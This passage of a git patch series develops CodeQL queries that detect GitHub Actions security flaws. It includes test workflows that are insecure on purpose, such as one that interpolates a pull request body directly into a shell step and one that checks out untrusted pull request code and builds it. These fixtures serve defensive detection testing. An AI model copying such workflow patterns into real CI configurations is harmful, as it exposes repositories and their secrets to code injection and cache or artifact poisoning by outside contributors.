d85fc698394d..1676d742d37e 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,12 +1,10 @@ --- name: githubsecuritylab/actions-tests -groups: - - actions - - test +groups: [javascript, test] dependencies: githubsecuritylab/actions-all: ${workspace} githubsecuritylab/actions-queries: ${workspace} -extractor: yaml +extractor: javascript tests: . warnOnImplicitThis: true From 65b51996a6ff02d2d97e1480a768756ed18af33a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:59:51 +0200 Subject: [PATCH 315/707] new tests --- .../security/ArtifactPoisoningQuery.qll | 2 +- .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 +++++++ .../CWE-094/CodeInjectionMedium.expected | 7 +++++++ .../.github/workflows/artifactpoisoning7.yml | 21 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + 6 files changed, 59 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 3635004bc318..45d9a08d00ab 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -44,7 +44,7 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep ) and ( not exists(this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])) or - not this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"]) + this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"]) .matches("%github.event.workflow_run.id%") ) and ( diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml new file mode 100644 index 000000000000..e815c3dd1292 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml @@ -0,0 +1,21 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + run: echo "::set-output name=id::$( Date: Mon, 3 Jun 2024 22:17:42 +0200 Subject: [PATCH 316/707] Dont consider pull_request with write permissions as priv --- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 ++- .../.github/workflows/priv_pull_request.yml | 14 ++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 + .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../CWE-829/UntrustedCheckoutCritical.expected | 1 - .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 6 files changed, 20 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e31edf7900af..d4864a80e54f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -890,7 +890,8 @@ class JobImpl extends AstNodeImpl, TJobNode { e.isExternallyTriggerable() and // job is privileged (write access or access to secrets) ( - this.isPrivileged() + this.isPrivileged() and + not e.getName() = "pull_request" or not this.isPrivileged() and e.isPrivileged() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml new file mode 100644 index 000000000000..560e69f9e4b0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -0,0 +1,14 @@ +name: Privileged (only when local) pull request + +on: + pull_request: + +permissions: + pull-requests: write + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo "${{ github.event.pull_request.body }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 718ef7a4ad12..f7b4ae7bc117 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 02000ea2bb04..be5a4e60b729 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -174,6 +174,7 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -282,6 +283,7 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607df..92d5a0b5ce18 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -4,6 +4,5 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 9adfa3cee7cc..544d26da9b74 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,2 +1,3 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 28af21c556237ec784e0b0e1e1ae22c2484514c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 08:57:43 +0200 Subject: [PATCH 317/707] Update ql suites --- ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll | 5 +++-- ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll | 5 +++-- ql/src/Debug/partial.ql | 2 ++ ql/src/codeql-suites/actions-all.qls | 4 ++++ ql/src/codeql-suites/actions-code-scanning.qls | 2 ++ 5 files changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 302e8d5bb8d3..cd049cccf4ed 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -13,8 +13,9 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index ead69480d8a5..a692c6e58741 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -26,8 +26,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + // (eg: echo DATABASE_SHA=`yq '.creationMetadata.sha' codeql-database.yml` >> $GITHUB_ENV) + value + .regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<", "jq\\s+", "yq\\s+"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index 27cad8b98a43..cb8ba7873d8c 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -5,6 +5,8 @@ * @precision low * @problem.severity error * @id actions/test-dataflow + * @tags actions + * debug */ import actions diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 32b9b5800cd5..be9be8666201 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -4,3 +4,7 @@ kind: - problem - path-problem +- exclude: + tags contain: + - debug + - model-generator diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 7d6c94e0c8c8..d0fd74736ce7 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -17,3 +17,5 @@ tags contain: - experimental - testing + - debug + - model-generator From 284c52f9728b1e302ba48eba369e585672afdcb2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 10:54:37 +0200 Subject: [PATCH 318/707] Bump qlpack versions --- .../actions/security/CachePoisoningQuery.qll | 61 ++++++++----------- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 22 +++++-- .../CWE-349/CachePoisoningByCodeInjection.ql | 24 +++++--- ql/src/qlpack.yml | 2 +- .../CWE-349/.github/workflows/test18.yml | 31 ++++++++++ 6 files changed, 91 insertions(+), 51 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 318548859b55..e80ea71c958a 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -17,51 +17,40 @@ string defaultBranchNames() { result = default_branch_name ) or - not exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) - ) and + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and result = ["main", "master"] } -predicate runsOnDefaultBranch(Job j) { - exists(Event e | - j.getATriggerEvent() = e and +predicate runsOnDefaultBranch(Event e) { + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = defaultBranchNames() + or + e.getName() = "pull_request_target" and ( - e.getName() = defaultBranchTriggerEvent() and - not e.getName() = "pull_request_target" + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") or - e.getName() = "push" and + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and e.getAPropertyValue("branches") = defaultBranchNames() or - e.getName() = "pull_request_target" and - ( - // no filtering - not e.hasProperty("branches") and not e.hasProperty("branches-ignore") - or - // only branches-ignore filter - e.hasProperty("branches-ignore") and - not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() - or - // only branches filter - e.hasProperty("branches") and - not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() - or - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = defaultBranchNames() and - not e.getAPropertyValue("branches-ignore") = defaultBranchNames() - ) + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) - or - j.getATriggerEvent().getName() = "workflow_call" and - exists(ExternalJob call | - call.getCallee() = j.getLocation().getFile().getRelativePath() and - runsOnDefaultBranch(call) - ) } abstract class CacheWritingStep extends Step { } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9acfb3035a41..bf05e80e0a60 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.32 +version: 0.0.33 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index d81c13021c17..a6dc7e14fdd4 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -16,15 +16,25 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout, Step s +from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where - // the workflow runs in the context of the default branch - runsOnDefaultBranch(j) and + j.getATriggerEvent() = e and + // job can be triggered by an external user + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and // the job checkouts untrusted code from a pull request // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and - // job can be triggered by an external user - j.getATriggerEvent().isExternallyTriggerable() and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) @@ -35,7 +45,7 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and s instanceof PoisonableStep and - // excluding privileged workflows since they can be easily exploited in similar circumstances + // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 5ed3c966ad31..8fdebdbde188 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -17,16 +17,26 @@ import codeql.actions.security.CodeInjectionQuery import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e where - CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() and + j.getATriggerEvent() = e and // job can be triggered by an external user - j.getATriggerEvent().isExternallyTriggerable() and - // excluding privileged workflows since they can be easily exploited in similar circumstances + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() and - // The workflow runs in the context of the default branch - runsOnDefaultBranch(j) + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5637bef68a03..2f79bddd77e5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.32 +version: 0.0.33 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml new file mode 100644 index 000000000000..6bfdc5b7d50a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml @@ -0,0 +1,31 @@ +name: Test + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version-file: .nvmrc + + - name: Install NPM dependencies + run: npm ci + + - name: Rebuild the dist/ directory + run: npm run build + + - name: Compare the expected and actual dist/ directories + run: bin/check-build-output-in-dist-directory From 2c96127425896a9f6433970dae012676d0745896 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 5 Jun 2024 16:34:52 +0200 Subject: [PATCH 319/707] Improve event context sources + test --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 +- .../Security/CWE-094/.github/workflows/test6.yml | 16 ++++++++++++++++ 2 files changed, 17 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 5f2d36e7cd80..7217796d138b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -200,7 +200,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { or regexp = pathEvent() and flag = "filename" ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") + normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml new file mode 100644 index 000000000000..535b9bd24bef --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test6.yml @@ -0,0 +1,16 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + { + echo "recreate_vm=${{ contains(github.event.comment.body, 'recreate-vm') }}" + } >> $GITHUB_OUTPUT + From d344d9b97ad8811b8d2b72953bff3b7516744825 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 320/707] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 25 files changed, 310 insertions(+), 286 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf459..feafe4f68bb0 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa88..8203a54dfebd 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef65..2e3c13f164c2 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd539279..17b29f57025c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() @@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a 